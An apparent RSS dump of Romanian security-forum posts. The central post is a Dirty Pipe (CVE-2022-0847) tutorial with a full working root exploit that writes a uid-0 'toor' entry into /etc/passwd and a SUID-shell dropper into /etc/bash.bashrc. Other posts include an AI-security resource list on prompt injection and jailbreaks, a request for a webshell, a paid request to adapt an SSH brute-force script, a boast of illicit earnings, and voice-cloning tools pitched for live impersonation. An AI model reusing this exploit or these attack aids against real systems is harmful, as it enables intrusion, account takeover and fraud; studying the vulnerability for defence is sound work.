				Hub, models, spaces
			
			
				huntr.com
			
		
		
			
				Anthropic Bug Bounty
			
			
				Claude, API
			
			
				anthropic.com/security
			
		
		
			
				Microsoft (Copilot, Azure AI)
			
			
				Copilot, Azure OpenAI
			
			
				msrc.microsoft.com
			
		
		
			
				Huntr (AI/ML focused)
			
			
				Open source ML libraries
			
			
				huntr.com
			
		
	



	Tips for AI bug bounty:
 


	
		Focus on data exfiltration via markdown rendering (common finding)
	
	
		Test plugin/tool integrations thoroughly
	
	
		Look for prompt injection in RAG pipelines
	
	
		Explore memory and persistent context manipulation
	
	
		Check for cross-tenant data leakage in multi-user deployments
	




	
		Community &amp; News
	



	
		Communities
	



	
		AI Village — DEF CON's AI security community
	
	
		OWASP AI Exchange — Open standard for AI security
	
	
		ProtectAI — AI security research and tools
	
	
		Embrace the Red — Blog — Leading blog on LLM security
	
	
		Kai Greshake's Research — Indirect prompt injection research
	



	
		Newsletters &amp; Blogs
	



	
		The Batch — DeepLearning.AI — Weekly AI news
	
	
		Simon Willison's Weblog — Authoritative LLM security commentary
	
	
		HiddenLayer Research — AI security research
	
	
		Lakera Blog — LLM security insights
	
	
		PortSwigger Research — Web + AI security research
	




	
		Suggested Learning Path by Experience Level
	



	
		🟢 Beginner (0–3 months)
	



	
		Complete PortSwigger Web Security Academy fundamentals
	
	
		Learn Python basics
	
	
		Take Google ML Crash Course
	
	
		Read OWASP LLM Top 10
	
	
		Play Gandalf — all levels
	
	
		Read Simon Willison's prompt injection article
	
	
		Watch Andrej Karpathy — Intro to LLMs
	



	
		🟡 Intermediate (3–9 months)
	



	
		Study MITRE ATLAS Matrix
	
	
		Complete PortSwigger LLM Attack labs
	
	
		Set up and exploit Damn Vulnerable LLM Agent
	
	
		Complete Prompt Airlines and Crucible challenges
	
	
		Read the LLM Hacker's Handbook
	
	
		Study the Embrace the Red blog in full
	
	
		Experiment with Garak and PyRIT
	
	
		Try Offensive ML Playbook
	



	
		🔴 Advanced (9+ months)
	



	
		Participate in AI Village CTF at DEF CON
	
	
		Submit findings to Huntr or OpenAI Bug Bounty
	
	
		Study adversarial ML with ART and CleverHans
	
	
		Read academic papers on model inversion, membership inference, and data extraction
	
	
		Contribute to open source tools like Garak or AI Exploits
	
	
		Build your own vulnerable LLM demo environment
	
	
		Write and publish research — blog posts, CVEs, conference talks
	




	
		Key Academic Papers
	



	
		
			
				Paper
			
			
				Year
			
		
	
	
		
			
				Explaining and Harnessing Adversarial Examples — Goodfellow et al.
			
			
				2014
			
		
		
			
				Extracting Training Data from Large Language Models — Carlini et al.
			
			
				2021
			
		
		
			
				Not What You've Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection — Greshake et al.
			
			
				2023
			
		
		
			
				Membership Inference Attacks against Machine Learning Models — Shokri et al.
			
			
				2017
			
		
		
			
				Universal and Transferable Adversarial Attacks on Aligned Language Models — Zou et al.
			
			
				2023
			
		
		
			
				Jailbroken: How Does LLM Safety Training Fail? — Wei et al.
			
			
				2023
			
		
		
			
				Prompt Injection attack against LLM-integrated Applications
			
			
				2023
			
		
	




	Last updated: 2025 | Contributions welcome — submit a PR with new resources.
 


	 
 


	Sursa: https://github.com/anmolksachan/AI-ML-Free-Resources-for-Security-and-Prompt-Injection]]></description><pubDate>Fri, 27 Feb 2026 14:26:49 +0000</pubDate></item><item><title>[Q] Sfaturi pentru un viitor in CyberSecurty?</title><link><![CDATA[https://rstforums.com/forum/topic/124054-q-sfaturi-pentru-un-viitor-in-cybersecurty/?do=findComment&comment=701770]]></link><description>Vreau sa incep sa lucrez la ceva pentru viitorul meu, cu ce ar trebuii sa incep pentru un viitor legat de securitatea cibernetica?</description><pubDate>Thu, 26 Feb 2026 23:01:50 +0000</pubDate></item><item><title>Malwarebytes Smoking Crack (0day + Banger Song)</title><link><![CDATA[https://rstforums.com/forum/topic/124044-malwarebytes-smoking-crack-0day-banger-song/?do=findComment&comment=701736]]></link><description>Ati vazut asta? 
 


	 
 


	#UwU Underground</description><pubDate>Sat, 21 Feb 2026 11:35:46 +0000</pubDate></item><item><title>Linux Kernel Dirty Pipe Exploitation (Logic Bug &#x2014; CVE-2022&#x2013;0847)</title><link><![CDATA[https://rstforums.com/forum/topic/124041-linux-kernel-dirty-pipe-exploitation-logic-bug-%E2%80%94-cve-2022%E2%80%930847/?do=findComment&comment=701707]]></link><description><![CDATA[by: Antonius (w1sdom) 
	https://www.bluedragonsec.com 
	https://github.com/bluedragonsecurity
 


	 
 


	Dirty Pipe (CVE-2022–0847) is one of the most significant security vulnerabilities in Linux Kernel 5.8–5.15.24, discovered by Max Kellermann in 2022. This vulnerability allows ordinary users (without special privileges) to overwrite data in files that should be read-only.
 


	6.3.3.1. Understanding Core Concepts



	Before discussing Dirty Pipe in detail, here are some Linux kernel internal concepts that need to be understood:
 


	1. Paging



	Paging is a memory management mechanism in the Linux kernel where the memory system divides physical memory into fixed-size small blocks called page frames, and virtual memory is divided into blocks of the same size called pages.
 


	This mechanism allows the kernel to map virtual address space of processes to physical memory in a non-sequential manner, which is crucial for efficiency and security in modern systems.
 


	2. Page (Virtual Memory)



	In Linux, a page is the smallest unit of physical memory management handled by the kernel.
 


	Analogy: RAM is like a giant book. A page is one sheet of paper in that book. The kernel doesn’t move data bit by bit, but rather sheet by sheet (page by page).
 


	Generally, on modern system architectures (such as x86_64), the standard size of one page is 4 KB (4096 bytes).
 


	3. Page Cache



	This is a crucial part. Linux doesn’t read files directly from disk every time because it’s slow. The kernel copies file contents into RAM called the Page Cache.
 


	
		When we read a file, the kernel loads it into the Page Cache.
	
	
		If another process wants to read the same file, the kernel only provides a reference to the page that already exists in that memory.
	



	Page cache resides in kernel space.
 


	4. Pipe Buffer



	Pipe is an Inter-Process Communication (IPC) mechanism. Internally, the kernel manages pipes using the pipe_inode_info data structure. Data inside a pipe is stored in a “buffer” called Pipe Buffer.
 


	
		Ring Buffer: The kernel uses a circular (ring) structure to manage this buffer. A ring buffer is a data structure that uses a single array with a fixed size as if its end is connected back to its beginning. This creates a data flow that “rotates” endlessly.
	
	
		Flags: Each buffer has attributes or “flags” that determine its behavior (for example, whether the buffer can be merged).
	



	Pipe buffer resides in kernel space.
 


	5. Pipe Buffer Flag (PIPE_BUF_FLAG_CAN_MERGE)



	The PIPE_BUF_FLAG_CAN_MERGE flag was introduced in Linux Kernel version 5.8.
 


	This is where the main vulnerability lies. The flag named PIPE_BUF_FLAG_CAN_MERGE.
 


	
		Its function: Tells the kernel that new data written to the pipe can be merged into an existing buffer.
	
	
		The problem: Before the Dirty Pipe fix, the kernel did not properly clear (reset) this flag when performing splice().
	



	6. Splice



	splice() is a syscall for moving data between two file descriptors without copying the data between kernel space and user space. This is often referred to as a Zero-copy mechanism.
 


	The splice() syscall is the “main actor” in Dirty Pipe:
 


	
		Instead of physically copying data, splice() performs optimization by making the Pipe Buffer point directly to the page in the Page Cache.
	
	
		This means the pipe doesn’t contain a copy of the file data, but only a “pointer” to the file’s physical memory.
	



	7. Copy on Write (CoW)



	The Copy-on-Write (CoW) mechanism is a memory management optimization strategy used by the Linux kernel to delay data copying until absolutely necessary.
 


	The relationship between Copy-on-Write (CoW) and the Dirty Pipe exploit (CVE-2022–0847) is about how a small bug in the Linux kernel successfully “tricks” the CoW mechanism, allowing data to be written to files that should be read-only.
 


	8. Dirty Page



	A dirty page is a memory page in RAM that has been modified by an application, but the changes have not yet been written back to secondary storage (such as SSD or hard disk).
 


	6.3.3.2. Analysis of Dirty Pipe Vulnerability



	Dirty Pipe is a type of logic bug in pipe buffer handling in Linux kernel 5.8 through Linux kernel 5.15.24.
 


	The main problem lies in the Pipe mechanism (inter-process communication channel) and how the kernel manages the Page Cache (memory that stores copies of file data from disk).
 


	The core issue is a bug in the PIPE_BUF_FLAG_CAN_MERGE flag.
 


	The main problem lies in the kernel’s failure to properly re-initialize this flag (logic bug). Here is the code analysis:
 


	In the copy_page_to_iter_pipe and push_to_pipe functions in the Linux kernel before version 5.16.11, when performing splice operations, the kernel prepares the pipe_buffer structure but forgets to clean the .flags member.
 


	Vulnerable Code Structure:
 


	 
 


	Location of problem: fs/pipe.c or include/linux/pipe_fs_i.h
 

// Location of problem: fs/pipe.c or include/linux/pipe_fs_i.h
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags; // &lt;--- THIS FLAG IS NOT RESET
    unsigned long private;
};


	Code Before Patch (Vulnerable):
 

// lib/iov_iter.c - Before CVE-2022-0847 patch
static size_t copy_page_to_iter_pipe(struct page *page,
    size_t offset, size_t bytes, struct iov_iter *i) {
    // ---------snip-----------
    struct pipe_buffer *buf = &amp;pipe-&gt;bufs[head &amp; mask];

    buf-&gt;ops = &amp;page_cache_pipe_buf_ops;
    buf-&gt;page = page;
    buf-&gt;offset = offset;
    buf-&gt;len = bytes;
    // PROBLEM: buf-&gt;flags NOT TOUCHED AT ALL
    // --------snip----------------------
}


	Code After Patch (Fixed):
 

buf-&gt;ops = &amp;page_cache_pipe_buf_ops;
buf-&gt;page = page;
buf-&gt;offset = offset;
buf-&gt;len = bytes;
buf-&gt;flags = 0; // &lt;--- TOTAL RESET TO ZERO


	Why is buf-&gt;flags = 0 better than just turning off a specific flag? Because pipe_buffer is a reused structure. If we only turn off one flag (CAN_MERGE), other garbage flags from previous pipe usage (such as PIPE_BUF_FLAG_GIFT or other custom flags) might still remain and cause strange behavior or new security holes in the future. Setting it to 0 ensures the buffer is in a completely “clean” state.
 


	Why Can This Be Exploited?



	Here is the Dirty Pipe exploitation flow:
 


	
		Pollution Stage: The attacker inserts data into the pipe via write(). A regular write() operation will set buf-&gt;flags = PIPE_BUF_FLAG_CAN_MERGE.
	
	
		Drain Stage: The attacker reads that data. The buffer is now logically “empty”, but its structure still exists in kernel memory with the CAN_MERGE flag still active.
	
	
		Splice Stage: When the splice() syscall maps a read-only file to a pipe, the copy_page_to_iter_pipe() function is called. Due to the bug above, it fills buf-&gt;page with the original file’s memory page but doesn’t reset buf-&gt;flags.
	
	
		Execution: The kernel thinks this file buffer can still be merged. The next write to the pipe won’t create a new buffer, but will actually modify directly the memory page (Page Cache) that was mapped earlier.
	



	At this stage, the attacker’s data is already stored in RAM. A page in RAM whose contents differ from what’s on disk is called a “Dirty Page”.
 


	If this stage is successfully reached, it means the exploitation has succeeded! Once the Page Cache changes, the effect is instant. If we overwrite /etc/passwd in RAM, we can immediately run su root at that very moment.
 


	6.3.3.3. Dirty Pipe Exploitation



	For Dirty Pipe exploitation, we don’t need to disable any kernel protections because all kernel protections are irrelevant to prevent this logic bug.
 


	To exploit the Dirty Page logic bug, our exploit will perform the following steps:
 


	Step 1. Prepare the pipe and fill the pipe until full with the goal of triggering the PIPE_BUF_FLAG_CAN_MERGE flag.
 

pipe(p);
int capacity = fcntl(p[1], 1032);
static char dummy[4096];
for (int r = capacity; r &gt; 0; ) {
    int n = r &gt; sizeof(dummy) ? sizeof(dummy) : r;
    write(p[1], dummy, n);
    r -= n;
}


	Step 2. Empty the pipe.
 

for (int r = capacity; r &gt; 0; ) {
    int n = r &gt; sizeof(dummy) ? sizeof(dummy) : r;
    read(p[0], dummy, n);
    r -= n;
}


	Step 3. Use splice() to insert data from the target file into the pipe.
 

if (splice(fd, &amp;offset, p[1], NULL, 1, 0) &lt; 0) {
    perror("[-] splice failed");
    return 0;
}


	Step 4. Write the payload data to the pipe.
 

write(p[1], payload, strlen(payload));


	Complete Exploit Code for Dirty Pipe Exploitation
 

/*
Exploit Title: Linux Kernel 5.8 &lt; 5.15.25 - Local Privilege Escalation (DirtyPipe 2)
Exploit Author: Antonius (w1sdom)
github : https://github.com/bluedragonsecurity
web : https://www.bluedragonsec.com

tested on :
- linux kernel 5.13.0-21-generic (compiled on lubuntu 20.04.5)
- linux lubuntu 20.04.2 - linux kernel 5.8

Original Author: Max Kellermann (max.kellermann@ionos.com)
CVE: CVE-2022-0847

 * Copyright 2022 CM4all GmbH / IONOS SE
 *
 * author: Max Kellermann &lt;max.kellermann@ionos.com&gt;
 *
 * Proof-of-concept exploit for the Dirty Pipe
 * vulnerability (CVE-2022-0847) caused by an uninitialized
 * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
 * file contents in the page cache, even if the file is not permitted
 * to be written, immutable or on a read-only mount.
 *
 * This exploit requires Linux 5.8 or later; the code path was made
 * reachable by commit f6dd975583bd ("pipe: merge
 * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
 * there before, it just provided an easy way to exploit it.
 *
 * There are two major limitations of this exploit: the offset cannot
 * be on a page boundary (it needs to write one byte before the offset
 * to add a reference to this page to the pipe), and the write cannot
 * cross a page boundary.
 *
 * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
 *
 * Further explanation: https://dirtypipe.cm4all.com/
*/
#define _GNU_SOURCE
#include &lt;unistd.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;sys/utsname.h&gt;
#include &lt;ctype.h&gt;

int validate_kernv() {
    struct utsname buffer;
    int major, minor, patch;
    int is_vulnerable = 0;
    char *version_str;
    int len, compile_year;

    if (uname(&amp;buffer) != 0) {
        perror("uname");
        return 1;
    }
    version_str = buffer.version;
    len = strlen(version_str);
    compile_year = 0;
    for (int i = len - 4; i &gt;= 0; i--) {
        if (isdigit(version_str[i]) &amp;&amp; isdigit(version_str[i+1]) &amp;&amp; 
            isdigit(version_str[i+2]) &amp;&amp; isdigit(version_str[i+3])) {
            compile_year = atoi(&amp;version_str[i]);
            break;
        }
    }
    if (compile_year &lt; 2023) {
        is_vulnerable = 1;
    }
    int fields = sscanf(buffer.release, "%d.%d.%d", &amp;major, &amp;minor, &amp;patch);
    if (fields &lt; 3) patch = 0;
    if (major == 5) {
        if (minor &gt;= 8 &amp;&amp; minor &lt;= 14) {
            is_vulnerable = 1;
        }
        else if (minor == 15 &amp;&amp; patch &lt; 25) {
            is_vulnerable = 1;
        }
    }
    else {
        printf("[-] kernel is not vulnerable !!! quitting ...");
        exit(-1);
    }
    
    if (is_vulnerable) {
     printf("[*] kernel is vulnerable\n");
    }
    else {
     printf("[-] kernel is not vulnerable !!! quitting ...");
        exit(-1);
    }

    return 0;
}

void prepare_pipe(int p[2]) {
    pipe(p);
    int capacity = fcntl(p[1], 1032);
    static char dummy[4096];
    for (int r = capacity; r &gt; 0; ) {
        int n = r &gt; sizeof(dummy) ? sizeof(dummy) : r;
        write(p[1], dummy, n);
        r -= n;
    }
    for (int r = capacity; r &gt; 0; ) {
        int n = r &gt; sizeof(dummy) ? sizeof(dummy) : r;
        read(p[0], dummy, n);
        r -= n;
    }
}

int inject_payload(char *target, char *payload) {
    int fd = open(target, O_RDONLY);
    int p[2];
    __off64_t offset = 1; 

    prepare_pipe(p);
    fd = open(target, O_RDONLY);
    if (fd &lt; 0) return 1;
    if (splice(fd, &amp;offset, p[1], NULL, 1, 0) &lt; 0) {
        perror("[-] splice failed");
        return 0;
    }
    printf("[*] injecting payload to %s\n", target);
    write(p[1], payload, strlen(payload));

    return 1;
}

void bashrc() {
    char *target = "/etc/bash.bashrc";
    char *payload = "\ncp /bin/bash /tmp/x; chmod +s /tmp/x\n#";
    if (inject_payload(target, payload) == 0) {
        printf("[-] failed to inject payload !");
    }
    else {
     printf("[*] payload injected to %s\n", target);
     printf("[*] you need to wait for root to login\n");
     printf("[*] once the root logged in you will get suid shell on /tmp/x\n");
     printf("[*] get root by : /tmp/x -p\n");
    }
}

int toor_check() {
    FILE *fp;
    char path[1035];

    fp = popen("su toor -c id", "r");
    if (fp == NULL) {
        return 0;
    }
    if (fgets(path, sizeof(path), fp) != NULL) {
        if (strstr(path, "root")) {
            return 1;
        } 
    }
    pclose(fp);

    return 0;
}

int passwd() {
    char *target = "/etc/passwd";
    char *payload = "\ntoor::0:0:root:/root:/bin/bash\n#";
    
    system("cp /etc/passwd /tmp/passwd.bak");
    if (inject_payload(target, payload) == 0) {
        printf("[-] failed to inject payload !");
    }
 if (toor_check() == 1) {
        printf("[+] exploitation success, getting root for you.\n");
        system("su toor");
    }
    else {
        printf("[-] failed on method 1, testing method 2\n");  
        return 0;      
    }

    return 1;
}

int main() {
    validate_kernv();
    if (passwd() == 0) {
        bashrc(); 
    }

    return 0;
}


	Note: The complete exploit code contains functions for kernel version validation, pipe preparation, payload injection, and two different exploitation methods targeting /etc/passwd and /etc/bash.bashrc.
 


	Exploitation Methods



	The exploit above uses 2 different payloads with the goal that if the first payload fails, it will be chained by the second payload.
 


	Payload 1: Writes to /etc/passwd to add a new user named ‘toor’ with uid 0. If this payload succeeds, we can immediately get root shell.
 


	Payload 2: Aims to drop a SUID bash shell at /tmp/x. Specifically for the second payload, it must wait for the root user on the system to login because the payload to drop the SUID shell is injected into /etc/bash.bashrc. In Linux, commands contained in /etc/bash.bashrc are executed by every user who logs into the system at login time.
 


	#
 


	Testing the Exploit



	In this example, I used Linux kernel 5.13 running on Lubuntu 20.04.5 in VirtualBox as a guest OS and the host OS is Kali Linux 2025.4.
 


	On the Lubuntu 20.04.5 machine, compile the exploit:
 


	gcc -o dirtypipe2 dirtypipe2.c
 


	Run the exploit:
 


	./dirtypipe2
 


	and finally, we got root shell :



	Press enter or click to view image in full size
	
		 
	



	
 


	References



	Original disclosure: https://dirtypipe.cm4all.com/
 


	CVE-2022–0847: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847
 


	Linux Kernel patch: commit 9d2231c5d74e13b2a0546fee6737ee4446017903
 


	Exploit code: https://github.com/bluedragonsecurity]]></description><pubDate>Thu, 19 Feb 2026 07:14:59 +0000</pubDate></item><item><title>Hello from Indonesia</title><link><![CDATA[https://rstforums.com/forum/topic/124040-hello-from-indonesia/?do=findComment&comment=701706]]></link><description>Hello buddy ! 
 


	I am from Indonesia, 
 


	I am a Chinese born in Indonesia.
 


	 
 


	I just notice this forum after doing google search for a linux kernel rootkit that I created in 2014. 
 


	 
 


	Here's the topic : 
 



	 
 


	I thinks this forum is cool and it will be nice to register here , in my past time, I have some friends from Europe
 


	some Albanian hacker friends in my past time  such as x-hack, danzel
 


	a greece friend : getch
 


	 
 


	is Romania near to Albania and Greece ?</description><pubDate>Thu, 19 Feb 2026 07:11:55 +0000</pubDate></item><item><title>Client OPNsense (pFsense)</title><link><![CDATA[https://rstforums.com/forum/topic/124039-client-opnsense-pfsense/?do=findComment&comment=701683]]></link><description>Bun&#x103; seara 
 


	&#xCE;ncerc de ceva timp s&#x103; &#xEE;nlocuiesc un router comercial "de top" cu un mini pc pe care am instalat OPNsense (&#x219;i &#xEE;nainte pfSense).
 


	Acest mini pc transformat &#xEE;n router doresc s&#x103; devin&#x103; clientul mai multor servere VPN.
 


	Certificatele sunt emise de routere consumer &#x219;i nu au formatul necesar (X.509). Ce solu&#x21B;ii a&#x219; avea? Un tutorial ? 
 


	P.S sunt un novice 
 


	Mul&#x21B;umesc</description><pubDate>Sun, 15 Feb 2026 17:49:12 +0000</pubDate></item><item><title>Cum merge bosilor hackereala pe la birou ?</title><link><![CDATA[https://rstforums.com/forum/topic/124030-cum-merge-bosilor-hackereala-pe-la-birou/?do=findComment&comment=701565]]></link><description>Bosilor, cum merge hackareala pe la biroul de corporatristi ?? N-am mai intrat de anul trecut. La mine merge de rupe... In ianuarie a bubuit treaba, peste 1,5 milioane de coco venit. Chinezii de la Huione au ajuns la 10-20 de miliarde de coco furati anul trecut... deci sunt un pestisor pe langa chinezii aia...
 


	 
 


	Pe la voi la birou cum merge cu hackareala ?? Gasiti bug-uri din alea sa va platiti ratele si sa cumparati pateul bucegi ? Va mai sponsorizeaza astia sa mergeti pe la 2-3 conferinte pe an ca sa adormiti prin sala ???</description><pubDate>Tue, 03 Feb 2026 23:25:46 +0000</pubDate></item><item><title>Webshell needed</title><link><![CDATA[https://rstforums.com/forum/topic/124028-webshell-needed/?do=findComment&comment=701563]]></link><description>Salut,
 


	 
 


	Am nevoie de un webshell mai recent, are careva? Vreau sa rulez niste teste la un EDR.
 


	 
 


	Mersi</description><pubDate>Mon, 02 Feb 2026 08:53:19 +0000</pubDate></item><item><title>1000 lei</title><link><![CDATA[https://rstforums.com/forum/topic/124014-1000-lei/?do=findComment&comment=701524]]></link><description>Va salut! Dupa cum zice si titlul, caut un mod de a reusi sa fac suma aceasta in 2 zile. Din cauza unor probleme personale ( un deces, schimbat job plus chirie ) am ajuns in punctul in care sa raman efectiv pe zero cu finantele, plus imprumuturi pana reusesc sa iau primul salariu aici. Dar vorba aia, chiria trebuie platita, iar proprietarul de aici m a pasuit deja luna trecuta cand am avut acel eveniment tragic in familie. Sunt unul dintre userii vechi pe aici, de cand matza moarta neagra se injura cu kw3, pax ne dadea xssuri sa furam prajituri la yahoo, ahead isi pierdea masina si virusica era pe garena, ca sa mai depanam amintri, dar nu postez de pe contul meu, cred ca de rusine. Nu am aparut aici ca sa cer ceva gratis, dar as avea rugamintea daca aveti nevoie de cineva care sa va ajute cu diferite taskuri contracost ce implica un calculator, sa ma contactati, si daca o pot face va ajut cu drag. Va multumesc, cu respect.</description><pubDate>Tue, 13 Jan 2026 20:25:24 +0000</pubDate></item><item><title>SVG Filters Clickjacking 2.0: What to Watch for and How to Defend Your Site</title><link><![CDATA[https://rstforums.com/forum/topic/124006-svg-filters-clickjacking-20-what-to-watch-for-and-how-to-defend-your-site/?do=findComment&comment=701512]]></link><description>RST just shared an interesting write-up on &#x201C;SVG Filters &#x2013; Clickjacking 2.0,&#x201D; posted in the Exploituri section (Dec 7, 2025). RST Forums The big idea is simple: attackers keep finding new ways to hide or reshape what users &#x201C;think&#x201D; they are clicking, so the user ends up approving the wrong action. This matters most for high-risk flows like payment approval, account recovery, password changes, crypto transfers, admin panels, and OAuth consent screens. Game Hub Emulator If you run a site or app, the best defense is layered: block framing where possible (CSP frame-ancestors is the modern choice, with X-Frame-Options as legacy backup), require re-auth or step-up checks for sensitive actions, add clear confirmation screens that show the exact action and target, and review any SVG rendering or filter usage in UI layers that sit near &#x201C;confirm&#x201D; buttons. Also test your key pages in a &#x201C;hostile embed&#x201D; scenario during security review, because clickjacking is often a UX trap more than a pure code bug. The forum post links the full external article for anyone who wants the deep dive.</description><pubDate>Thu, 08 Jan 2026 09:37:39 +0000</pubDate></item><item><title>[Vand] YubiKey Yubico 5C USB-C Securitate hardware completa, dispozitiv criptografic - SIGILAT, nou si IEFTIN</title><link><![CDATA[https://rstforums.com/forum/topic/123988-vand-yubikey-yubico-5c-usb-c-securitate-hardware-completa-dispozitiv-criptografic-sigilat-nou-si-ieftin/?do=findComment&comment=701451]]></link><description><![CDATA[Salutare. Vand acest produs sigilat, nou. Am cumparat 2 dispozitive la timpul respectiv si in prezent folosesc doar unul dintre ele si al doilea a ramas sigilat, nefolosit.
 


	-&gt; Descriere produs:
 


	YubiKey YuBico 5C USB-C nouă. Dispozitiv cu securitate avansată pentru autentificare. Protejează datele și accesul la conturi online. Conexiune rapidă prin USB-C.
 


	Yubikey 5C este o soluție de autentificare ce oferă protecție superioară împotriva phishing-ului, elimină preluările de cont și îndeplinește cerințe de conformitate pentru o autentificare puternică.
 


	YubiKey 5C este cheia de securitate USB-C de top din seria YubiKey 5, dezvoltată de Yubico, lider mondial în soluții de autentificare fără parolă. Este un dispozitiv de autentificare hardware multifactor (MFA), care oferă protecție avansată împotriva atacurilor cibernetice, printr-un set complet de protocoale moderne de securitate, inclusiv FIDO2, U2F, Smart Card (PIV), OTP, OpenPGP și altele.
 


	Cu o singură cheie compactă, compatibilă cu toate dispozitivele cu port USB-C, îți protejezi accesul la conturi și aplicații critice, fie că lucrezi de la birou, de acasă sau în deplasare.
 


	Ce este YubiKey 5C? 
	YubiKey 5C este o cheie fizică de securitate care se conectează prin USB-C și oferă o autentificare extrem de sigură, fără a mai fi nevoie de parole tradiționale sau coduri temporare prin SMS sau aplicații.
 


	Este destinată:
 


	Autentificării passwordless (fără parolă) 
	Autentificării în doi pași (2FA) 
	Autentificării multifactor (MFA) 
	Utilizatorilor care au nevoie de Smart Card / PIV, OTP, sau semnături digitale criptate 
	Cui i se adresează YubiKey 5C? 
	Utilizatorilor profesioniști care accesează conturi sensibile (e-mail, VPN, platforme cloud) 
	Companiilor care doresc să îmbunătățească securitatea angajaților cu autentificare FIDO2 hardware 
	Administratorilor IT care doresc integrarea rapidă în Active Directory, Azure AD, Okta, etc. 
	Oricărui utilizator care folosește dispozitive moderne cu port USB-C (MacBook, laptopuri Dell, HP, Lenovo etc.) 
	Beneficii și caracteristici cheie
 


	🔒 Multi-protocol, pentru orice nevoie de securitate
 


	YubiKey 5C suportă cele mai importante protocoale:
 


	FIDO2 / WebAuthn – pentru autentificare fără parolă 
	U2F – pentru compatibilitate cu servicii populare (Google, Microsoft) 
	Smart Card (PIV) – pentru acces securizat în rețele enterprise 
	OpenPGP – pentru criptare și semnături digitale 
	OTP (One-Time Passwords) – pentru compatibilitate cu sisteme clasice 
	🔌 USB-C – compatibilitate maximă cu dispozitive moderne
 


	Se conectează nativ la laptopuri, tablete și telefoane cu USB-C, fără adaptoare.
 


	⚙️ Nu necesită software, drivere sau baterii
 


	Se folosește imediat după conectare – plug &amp; play. Nu are componente mobile, nu necesită încărcare sau rețea.
 


	🌐 Compatibilitate largă cu servicii și aplicații
 


	Google Workspace, Microsoft 365, Azure, GitHub, Dropbox 
	Manageri de parole: Bitwarden, 1Password, LastPass 
	Sisteme IAM: Okta, Ping Identity, Duo Security 
	Browsere: Chrome, Edge, Firefox, Safari 
	Sisteme de operare: Windows, macOS, Linux, Android
 


	🛡️ Siguranță la nivel enterprise
 


	Nu transmite date prin rețea 
	Secretul criptografic este stocat pe un cip securizat, izolat de internet 
	Reduce drastic riscul de phishing și compromitere conturi 
	📈 Scalabilitate și eficiență în costuri
 


	Poate fi implementată rapid în organizații de orice dimensiune 
	Reduce costurile IT prin eliminarea resetărilor de parolă 
	Poate stoca până la 100 de credențiale FIDO2 și 64 de parole OTP pe aplicație 
	Cum funcționează YubiKey 5C? 
	Conectezi cheia la portul USB-C al dispozitivului 
	Activezi autentificarea pe contul dorit (Google, Microsoft etc.) 
	Te autentifici prin simpla atingere a cheii 
	În cazul autentificării multifactor, cheia poate fi folosită împreună cu un PIN sau alt factor suplimentar.
 


	De ce să alegi YubiKey 5C? 
	✔️ Securitate hardware impenetrabilă, fără rețea, fără cloud 
	✔️ Versatilitate absolută, datorită suportului multi-protocol 
	✔️ Compatibilitate extinsă cu aplicații și infrastructuri IT 
	✔️ USB-C nativ – fără adaptoare, fără compromisuri 
	✔️ Ideală pentru companii și profesioniști, dar și pentru utilizatori individuali 
	✔️ Gata de utilizare imediată, fără software sau instalare
 


	Întrebări frecvente (FAQ)
 


	Funcționează YubiKey 5C pe MacBook? 
	Da, este 100% compatibilă cu macOS și porturile USB-C native.
 


	Pot folosi aceeași cheie pentru mai multe conturi? 
	Absolut. Poți stoca până la 100 de conturi cu autentificare FIDO2.
 


	Este nevoie de aplicație pentru a o folosi? 
	Nu. Cheia funcționează fără software suplimentar – plug &amp; play.]]></description><pubDate>Fri, 12 Dec 2025 11:28:16 +0000</pubDate></item><item><title>salutare, cineva care se descurca cu go?</title><link><![CDATA[https://rstforums.com/forum/topic/123987-salutare-cineva-care-se-descurca-cu-go/?do=findComment&comment=701445]]></link><description>Am un script &#xEE;n Go pentru brute-force SSH care func&#x21B;ioneaz&#x103; bine &#x2013; detecteaz&#x103; honeypot-uri, conturi nologin &#x219;i servere reale. A&#x219; dori s&#x103; modific scriptul astfel &#xEE;nc&#xE2;t s&#x103; func&#x21B;ioneze pe domenii: username-ul s&#x103; nu mai fie prestabilit, ci s&#x103; fie format din primele 7 caractere ale numelui domeniului, iar parola s&#x103; fie numele domeniului f&#x103;r&#x103; extensia (.net, .com etc.). Sunt dispus s&#x103; pl&#x103;tesc &#xEE;ntre 50 &#x219;i 150 lei pentru aceast&#x103; modificare.</description><pubDate>Mon, 08 Dec 2025 20:28:03 +0000</pubDate></item><item><title><![CDATA[Open Source & Open Weights Ai Tools: Audio / Photo / Video (working on RTX 5090 and lower series)]]></title><link><![CDATA[https://rstforums.com/forum/topic/123986-open-source-open-weights-ai-tools-audio-photo-video-working-on-rtx-5090-and-lower-series/?do=findComment&comment=701442]]></link><description><![CDATA[RVC / Applio - voice cloner / stem extractor / speech to speech (Applio is compatible with RTX 50** series)
 


	
		RVC si Applio sunt unelte foarte utile pentru cei care vor sa cloneze vocea cuiva si sa o foloseasca in conversatii online, sau pentru a modifica o alta voce inregistrata anterior.
	
	
		Spre deosebire de clasicele modele TTS (text-to-speech), cu ajutorul acestor modele puteti vorbi LIVE la telefon sau pe platformele online.
	
	
		Puteti schimba in doar cateva secunde vocea originala de pe o melodie cu vocea voastra. 
	
	
		Puteti folosi cu succes atat vocile de femei cat si de barbati pe care le-ati clonat. Rezultatele pot iesi IMPECABIL.
	
	
		RVC este modelul original, insa nu ruleaza corespunzator pe noile placi grafice. Applio functioneaza fara probleme. Recomand sa testati direct Applio.
	
	
		Tutorialul video pentru RVC se aplica in mare parte si pentru Applio si poate fi gasit aici: https://www.youtube.com/watch?v=PYQnzIwa4mA
	



	 
 


	 
 


	Wan2GP - photo / video / lip sync models for GPU Poor (ruleaza si pe placile video nVidia de 6GB).
 


	
		Wan2GP are integrate mai multe modele ce pot fi folosite cu succes pentru a genera imagini de calitate, sau clipuri la o rezolutie mai mult decat decenta.
	
	
